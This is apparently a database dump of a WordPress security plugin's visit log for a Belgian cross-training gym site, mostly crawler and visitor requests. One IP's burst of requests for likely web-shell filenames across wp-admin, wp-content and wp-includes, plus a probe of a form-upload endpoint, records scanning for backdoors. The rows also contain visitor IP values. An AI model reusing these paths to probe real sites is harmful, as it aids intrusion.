(70449, 1492883214.040040, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70450, 1492883214.469453, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70451, 1492883214.898370, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70452, 1492883215.362046, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70453, 1492883215.843850, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70454, 1492883216.369625, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70455, 1492883216.797781, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70456, 1492883217.221210, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70457, 1492883217.749990, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70458, 1492889554.127559, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70459, 1492893990.088527, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(70460, 1492893990.671884, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(70461, 1492893991.653114, 676177851, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70462, 1492898260.580350, 2366158866, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70463, 1492899229.279639, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70464, 1492899232.443174, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70465, 1492901510.826930, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/php/', 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/php/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70466, 1492902193.659948, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70467, 1492902884.749288, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70468, 1492906448.734638, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70469, 1492935736.383970, 1439284665, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70470, 1492935738.464450, 1439284665, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70471, 1492935761.601810, 1439284665, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70472, 1492935777.740481, 1439284665, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70473, 1492935789.426213, 1439284665, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70474, 1492937232.112729, 676177833, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70475, 1492937232.132593, 676177833, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70476, 1492938821.173965, 1834499396, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwi5jNX1nbrTAhWKZVAKHRfGAkwQFgg0MAM&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(70477, 1492938822.313219, 1834499396, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(70478, 1492943263.112620, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70479, 1492943263.656101, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70480, 1492943950.288821, 2655379749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70481, 1492943955.049853, 2655379749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70482, 1492943955.524345, 2655379749, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70483, 1492943956.025757, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70484, 1492943957.075091, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70485, 1492943958.296262, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70486, 1492943959.289847, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70487, 1492943960.316243, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70488, 1492943962.716328, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70489, 1492943963.716861, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70490, 1492943964.863189, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70491, 1492943965.901817, 2655379749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36'),
(70492, 1492956211.928156, 1567842252, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://pizza-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(70493, 1492956920.792858, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70494, 1492956921.819900, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70495, 1492956922.340239, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70496, 1492957072.348273, 2637637575, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)'),
(70497, 1492959651.095035, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70498, 1492962356.855117, 676177685, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70499, 1492963892.363656, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70500, 1492965778.604399, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70501, 1492965779.198906, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70502, 1492965779.689062, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70503, 1492965780.187921, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70504, 1492965780.775904, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70505, 1492965781.407377, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70506, 1492965782.177357, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70507, 1492965782.703954, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70508, 1492965783.215209, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70509, 1492965783.727033, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70510, 1492965784.239025, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70511, 1492966000.791161, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70512, 1492967609.663173, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/css/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70513, 1492967609.685794, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/maink.php', 'http://crosstrainingcenter.be/wp-admin/css/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70514, 1492967645.426490, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70515, 1492967645.605073, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/logsa.php', 'http://crosstrainingcenter.be/wp-content/plugins/logsa.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70516, 1492967645.611949, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/images/maink.php', 'http://crosstrainingcenter.be/wp-admin/images/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70517, 1492967645.646236, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/maink.php', 'http://crosstrainingcenter.be/wp-admin/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70518, 1492967645.800911, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/maink.php', 'http://crosstrainingcenter.be/wp-admin/includes/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70519, 1492967645.824502, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/logo_img.php', 'http://crosstrainingcenter.be/wp-content/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70520, 1492967645.867807, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/includes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70521, 1492967646.026890, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/logo_img.php', 'http://crosstrainingcenter.be/wp-content/themes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70522, 1492967646.043442, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'http://crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70523, 1492967646.073576, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70524, 1492967646.076421, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/maink.php', 'http://crosstrainingcenter.be/wp-content/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70525, 1492967646.080059, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/network/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/network/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70526, 1492967646.142154, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/js/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/js/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70527, 1492967646.143062, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/js/maink.php', 'http://crosstrainingcenter.be/wp-admin/js/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70528, 1492967646.235927, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/user/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/user/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70529, 1492967683.951694, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'http://crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70530, 1492967683.988410, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/phpini.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/phpini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70531, 1492967684.004547, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/maink.php', 'http://crosstrainingcenter.be/wp-includes/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70532, 1492967684.135214, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/zenite/apache-conf.php', 'http://crosstrainingcenter.be/wp-content/themes/zenite/apache-conf.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70533, 1492967684.135971, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/css/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/css/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70534, 1492967684.201655, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/upgrade/logo_img.php', 'http://crosstrainingcenter.be/wp-content/upgrade/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70535, 1492967684.275906, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/images/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/images/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70536, 1492967684.316397, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70537, 1492967684.330717, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/js/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70538, 1492967684.331516, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/info.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70539, 1492967684.344674, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70540, 1492967684.348694, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/images/maink.php', 'http://crosstrainingcenter.be/wp-includes/images/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70541, 1492967684.382738, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70542, 1492967684.385182, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/nginx2.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/nginx2.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70543, 1492971255.079036, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70544, 1492971255.747194, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70545, 1492971256.369796, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70546, 1492971256.906486, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70547, 1492971257.511472, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70548, 1492971258.040249, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70549, 1492971258.731624, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70550, 1492971259.333151, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70551, 1492971259.859730, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70552, 1492971260.378427, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70553, 1492971260.862361, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70554, 1492973030.081418, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70555, 1492973705.450064, 2071807790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70556, 1492973705.523686, 2071806885, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(70557, 1492974492.716741, 1605828477, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) GSA/24.1.151204851 Mobile/13G36 Safari/601.1'),
(70558, 1492974603.237036, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70559, 1492974604.934857, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70560, 1492974607.694553, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
